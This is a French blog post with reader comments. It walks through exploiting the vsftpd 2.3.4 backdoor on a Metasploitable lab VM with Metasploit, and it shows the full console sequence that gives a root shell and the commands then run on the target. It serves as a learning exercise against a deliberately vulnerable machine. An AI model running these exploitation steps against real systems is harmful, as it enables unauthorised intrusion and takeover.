mardi 14 juin 2022

Exploitation d'une vulnérabilité dans Metasploitable



Attention !

Cet article contient des techniques pouvant être dangereuses si elles sont utilisées à mauvais escient.

Je ne suis pas responsable d'utilisations illégales et d'éventuels problèmes avec la loi en cas d'utilisation malveillante.


J'ai effectué cette expérience avec une machine Kali et une autre sous Metasploitable. La machine attaquante sous Kali a l'IP 192.168.1.33 et la cible sous Metasploitable l'IP 192.168.1.38. J'utilise METASPLOIT afin de réaliser ce hack.

┌──(root㉿kali)-[/home/hau]

└─# msfconsole

msf6 > search vsftpd (Recherche Exploit)

   #  Name                                  Disclosure Date  Rank       Check  Description

   -  ----                                  ---------------  ----       -----  -----------

   0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution (Nous avons l'exploit vsftpd_234_backdoor de 2011)

   msf6 > info exploit/unix/ftp/vsftpd_234_backdoor (Afin d'avoir des infos sur l'exploit)

       Name: VSFTPD v2.3.4 Backdoor Command Execution

     Module: exploit/unix/ftp/vsftpd_234_backdoor

   Platform: Unix (Plateforme visée, ici Unix)

    Rank: Excellent (donne le niveau de facilité d'exploitation, ici très peu de configuration et d'interaction à faire en amont. Le rang Excellent donne les vulnérabilités les plus critiques))    

    Disclosed: 2011-07-03 (date de découverte)

    Basic options: (Les options...)

  Name    Current Setting  Required  Description

  ----    ---------------  --------  -----------

  RHOSTS                   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit

  RPORT   21               yes       The target port (TCP)

    msf6 > use exploit/unix/ftp/vsftpd_234_backdoor (Pour lancer l'exploit; toujours respecter le chemin)

[*] No payload configured, defaulting to cmd/unix/interact

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > (On entre dans la configuration de l'exploit)

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > options (Pour voir les options requises)

Name    Current Setting  Required  Description

   ----    ---------------  --------  -----------

   RHOSTS                   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit (Nous indique que l'option RHOSTS est à remplir, correspond à l'IP de la machine cible, de l'hôte distant)

   RPORT   21               yes       The target port (TCP)

      A savoir que j'utiliserai cet exploit pour attaquer la machine Metasploitable. J'ai volontairement passé l'étape du scan permettant de découvrir cette faille dans la machine Metasploitable.

   msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.1.38 (Me permet d'attribuer l'IP de la machine cible (Metasploitable) à l'exploit)

RHOSTS => 192.168.1.38

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > options (Pour vérifier l'attribution de l'IP)

RHOSTS  192.168.1.38     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit (Je peux voir que l'IP a été attribuée à la cible)

Nous allons pouvoir attaquer notre machine cible:

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 192.168.1.38:21 - Banner: 220 (vsFTPd 2.3.4)

[*] 192.168.1.38:21 - USER: 331 Please specify the password.

[+] 192.168.1.38:21 - Backdoor service has been spawned, handling...

[+] 192.168.1.38:21 - UID: uid=0(root) gid=0(root)

[*] Found shell.

[*] Command shell session 1 opened (192.168.1.33:33335 -> 192.168.1.38:6200) at 2022-06-13 14:19:03 +0200 (Je peux voir que j'obtiens une session qui m'a connecté à la machine Metasploitable depuis ma machine attaquante dont l'IP est 192.168.1.33)

Désormais les commandes que je taperai depuis ma console d'attaque msf s'exécuteront directement sur la machine cible dont je viens de prendre le contrôle complet... On peut donc voir le niveau Excellent de cet exploit.

Je vais taper pwd sur ma machine attaquante afin de voir dans quel répertoire de je trouve:

pwd

/ (racine /)

cd /root (Pour changer de répertoire)

Je me rends dans ma machine Metasploitable:

ls /root (pour voir ce que j'ai dans le répertoire root)

bonjour.txt   Desktop   reset_logs.sh   vnc.log (soit 4 fichiers)

Je retourne dans ma machine attaquante:

touch salut.txt (Je crée un fichier sur la machine Metasploitable)

Je retourne sur la machine cible et je refais un ls /root:

bonjour.txt    Desktop    reset_logs.sh    vnc.log   salut.txt (J'ai à présent un 5ème fichier, celui que j'ai créé dans ma machine Kali attaquante, dans mon répertoire root)

Ayant le contrôle total, je peux supprimer des fichiers, redémarrer la machine, etc.

Ainsi la commande:

whoami

root (M'indique que je suis root, avec les droits, sur le système cible)

 Tout ceci pour montrer ce que l'on peut faire. Toutefois, manque l'étape de la reconnaissance/scanning réseau qui permet de trouver la vulnérabilité; la plus importante ! J'y reviendrai ultérieurement.

3 commentaires:

  1. Super mais je connais déjà

    RépondreSupprimer
  2. C'est bizarrement un peu trop facile. Sur quelle vulnérabilité exactement se base votre attaque s'il vous plaît ? Je suis étudiant et cela me permettra de savoir à quoi m'attendre.

    RépondreSupprimer
    Réponses
    1. Bonne réaction ! L'article ne porte que sur les possibilités de METASPLOITABLE. Donc manquent volontairement toutes les phases pré-exploitation. J'y viendrai ultérieurement. "Bizarrement un peu trop facile"... Oui ! C'est peut être ce que l'on peut reprocher à MESTPLOITABLE. Mais ça reste un bon outil pour comprendre ce que l'on fait et apprendre. Après votre message, je pense donc mettre en ligne les phases de reconnaissance, détermination des vulnérabilités existantes, l'analyse des ces vulnérabilités qui mènent à l'exploitation....

      Supprimer

Metasploit : Exploitation d'une vulnérabilité Samba

   Metasploit: Exploitation d'une vulnérabilité Samba Attention ! Cet article contient des techniques pouvant être dangereuses si elles...